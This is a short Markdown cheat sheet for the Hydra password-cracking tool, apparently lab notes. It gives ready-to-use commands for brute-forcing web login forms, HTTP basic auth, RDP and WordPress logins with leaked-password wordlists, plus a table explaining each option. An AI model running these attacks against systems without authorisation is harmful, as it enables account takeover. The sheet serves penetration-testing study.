38 lines
1.5 KiB
Markdown
38 lines
1.5 KiB
Markdown
|
# Hydra usage
|
||
|
|
||
|
## Examples
|
||
|
|
||
|
* HTTP post form
|
||
|
```sh
|
||
|
hydra -l <username> -P <wordlist> MACHINE_IP http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V
|
||
|
```
|
||
|
* HTTP basic auth
|
||
|
```sh
|
||
|
hydra -l bob -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -f 10.10.167.239 http-get /protected
|
||
|
```
|
||
|
|
||
|
|
||
|
|Command|Description|
|
||
|
|-------|-----------|
|
||
|
|`hydra -P <wordlist> -v <ip> <protocol>`|Brute force against a protocol of your choice|
|
||
|
|`hydra -v -V -u -L <username list> -P <password list> -t 1 -u <ip> <protocol>`|You can use Hydra to bruteforce usernames as well as passwords. It will loop through every combination in your lists. (-vV = verbose mode, showing login attempts)|
|
||
|
|`hydra -t 1 -V -f -l <username> -P <wordlist> rdp://<ip>`|Attack a Windows Remote Desktop with a password list.|
|
||
|
|`hydra -l <username> -P .<password list> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'`|Craft a more specific request for Hydra to brute force.|
|
||
|
|
||
|
## Parameter
|
||
|
|
||
|
|Option|Decription|
|
||
|
|------|----------|
|
||
|
|-l|Single username|
|
||
|
|-P|Indicates use the following wordlist|
|
||
|
|http-post-form|indicates the method|
|
||
|
|/login url|the login URL|
|
||
|
|:username|the form field where the username is entered|
|
||
|
|^USER^|tells Hydra to use the username from -l|
|
||
|
|password|the formfield where the password is entered|
|
||
|
|^PASS^|tells Hydra to use the wordlist from -P|
|
||
|
|Login|indicates to Hydra the login failed message|
|
||
|
|Login failed|is the login failure message that the form returns|
|
||
|
|F=incorrect|If this word appears on the page, login failed|
|
||
|
|-V| verbose|
|